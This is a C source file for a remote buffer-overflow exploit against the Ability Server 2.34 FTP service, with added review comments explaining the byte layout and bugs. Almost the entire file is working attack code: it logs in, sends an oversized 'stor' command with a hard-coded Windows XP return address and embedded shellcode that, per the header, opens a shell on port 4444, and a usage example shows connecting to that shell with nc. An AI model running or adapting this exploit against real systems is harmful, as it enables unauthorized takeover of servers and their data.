/*
  Ability Server 2.34 Remote Exploit      http://users.pandora.be/bratax/
  Just a basic Buffer Overflow

  Greetz go out to:  - muts @ http://www.whitehat.co.il/ for the vulnerability + example exploit
  							- kralor @ http://www.coromputer.net/ for teaching me everything
                     - Sergio Alvarez for the shellcode :D

  Notes:
  	[+] For educational purposes only!
   [+] You need to have access to the ftp server since the vulnerable buffer
       is located in the "stor" command.
   [+] I know there was already an exploit by muts for this vulnerability.
   	 I didn't just rewrite his Python code. I wrote the whole exploit on my own.
       I did use the same shellcode (which was originally written by Sergio Alvarez)
       and I did use the original exploit to learn more about the vulnerability.

   **************************************************
   Example:
   c:\bratax\ability>as.exe 127.0.0.1 hack me
   raping target...done
   **************************************************
   c:\bratax\ability>nc.exe 127.0.0.1 4444
   Microsoft Windows XP [versie 5.1.2600]
	(C) Copyright 1985-2001 Microsoft Corp.

	C:\bratax\ability>exit
   **************************************************
*/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#define PORT 21 // destination TCP port (the FTP control connection)
#define MAXDATASIZE 100 // NOTE(review): unused; main() reads replies into its own 1000-byte data[] buffer

/*
 * Payload that main() copies byte-for-byte into the request: 24 lines of
 * 16 bytes plus a final line of 15, i.e. 399 bytes (plus the implicit NUL
 * terminator of the string literal), which matches the 399-iteration copy
 * loop in main(). The file header attributes it to Sergio Alvarez and the
 * usage text describes it as spawning a shell on port 4444.
 * NOTE(review): opaque data; nothing in this file checks its length or
 * contents, so the 399 in main() and the literal here must be kept in sync
 * by hand.
 */
char shellcode []=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

/*
 * Entry point. Resolves argv[1], connects to TCP port PORT, waits for the
 * FTP greeting, sends "user <argv[2]>" and "pass <argv[3]>" while waiting
 * for the 331 / 230 replies, then sends a single oversized "stor" command
 * whose byte layout is hard-coded below.
 *
 * argv: <host> <username> <password>; argc must be exactly 4.
 * Returns 0 after the request has been sent. Calls exit(1) on a usage
 * error or when WSAStartup, gethostbyname, socket or connect fails.
 *
 * NOTE(review): exit() is called without including <stdlib.h>; the build
 * relies on it being declared transitively through <winsock2.h>.
 * NOTE(review): the socket is never closed and WSACleanup() is never
 * called; both are left to process teardown.
 */
int main(int argc, char *argv[]){

struct hostent *he;
struct sockaddr_in their_addr;

int sockfd;

char ip[16];        // written once below and never read again (gethostbyname uses argv[1])
char username[50];
char password[50];
char os[2];         // unused

char connectionstring[200] = "";   // "user <username>\r\n"
char connectionstring2[200] = "";  // "pass <password>\r\n"
char data[1000] = "";              // reply buffer; only its first 3-4 bytes are ever inspected

int x = 0, w = 0, y = 0, z = 0;    // only w is used (loop index); x, y, z are unused
char evilrequest[3500] = ""; // request buffer; zero-initialised, so strcat() below appends right after the last byte written

    WSADATA wsaData;

if (argc != 4){
	printf("\nAbility Server 2.34 Exploit by bratax\n\n");
   printf("[+] tested on WinXP SP2 Dutch Edtion - using return addy 0x7c941eed\n"); // NOTE(review): "Edtion" typo in the message text
   printf("[+] spawns a shell on p4444\n");
	printf("[+] usage: %s <host> <username> <password>\n\n", argv[0]);
	exit(1);

}

	strcpy(ip, argv[1]);        // NOTE(review): unbounded strcpy of argv into fixed 16- and 50-byte buffers
	strcpy(username, argv[2]);  // an over-long argument overruns the stack of this program itself
	strcpy(password, argv[3]);


if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
		fprintf(stderr, "WSAStartup failed.\n");
   	exit(1);
}


if ((he=gethostbyname(argv[1])) == NULL){	// resolve the target host (reads argv[1], not ip[])
	perror("gethoscattbyname");  // NOTE(review): message typo, should read "gethostbyname" (runtime string, left as is)
	exit(1);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
	perror("socket");
	exit(1);
}

their_addr.sin_family = AF_INET;	// host byte order
their_addr.sin_port = htons(PORT);	// short, network byte order
their_addr.sin_addr = *((struct in_addr *)he->h_addr);  // first resolved address only
memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){
	perror("connect");
	exit(1);
}

// Wait for the server greeting ("220 ...").
// NOTE(review): recv()'s return value is ignored here and in the two loops
// below; on error or peer close data[] is left unchanged, so the loop
// never terminates.
do {
	recv(sockfd, data, sizeof(data), 0);
	}
while ((strncmp (data, "220 ", 4)));

strcat(connectionstring, "user ");   // build "user <username>\r\n" (fits: 5 + 49 + 2 < 200)
strcat(connectionstring, username);
strcat(connectionstring, "\r\n");
send(sockfd,connectionstring,strlen(connectionstring),0);


// Wait for "331 ..." (password required).
do {
	recv(sockfd,data,sizeof(data),0);
	}
 while ((strncmp (data, "331 ", 4)));

strcat(connectionstring2, "pass ");  // build "pass <password>\r\n"
strcat(connectionstring2, password);
strcat(connectionstring2, "\r\n");
send(sockfd,connectionstring2,strlen(connectionstring2),0);

// Wait for "230..." (logged in). Note the 3-byte compare here vs. 4 above.
do {
	recv(sockfd,data,sizeof(data),0);
	}
while ((strncmp (data, "230", 3)));


strcpy (evilrequest, "stor ");  // bytes 0-4; all offsets below are indices into evilrequest

	printf("raping target...");
	for (w = 0; w < 969; w++){				// bytes 5-973: 'A' filler
		evilrequest[w+5] = 'A';
	}
   evilrequest[974] = '\xed';  // bytes 974-977: little-endian 0x7c941eed, the address quoted in the usage text
   evilrequest[975] = '\x1e';
   evilrequest[976] = '\x94';
   evilrequest[977] = '\x7c';
	for (w = 0; w < 100; w++){				// bytes 978-1077: 0x90 padding
		evilrequest[w+978] = '\x90';
	}
	for (w = 0; w < 399; w++){				// bytes 1078-1476: the 399-byte shellcode[] defined above
		evilrequest[w+1078] = shellcode[w];
	}
	for (w = 0; w < 500; w++){				// bytes 1477-1976: 'B' filler; the author notes the request did not
		evilrequest[w+1477] = 'B';			// work without it and that the reason was never investigated
	}

	strcat(evilrequest, "\r\n");				// lands at byte 1977, the first NUL left by the zero-initialiser (assuming shellcode[] holds no NUL); 1979 bytes total

	send(sockfd,evilrequest,strlen(evilrequest),0);  // strlen() stops at the same first NUL, so the whole 1979-byte request goes out
   printf("done");  // no trailing newline
return 0;
}
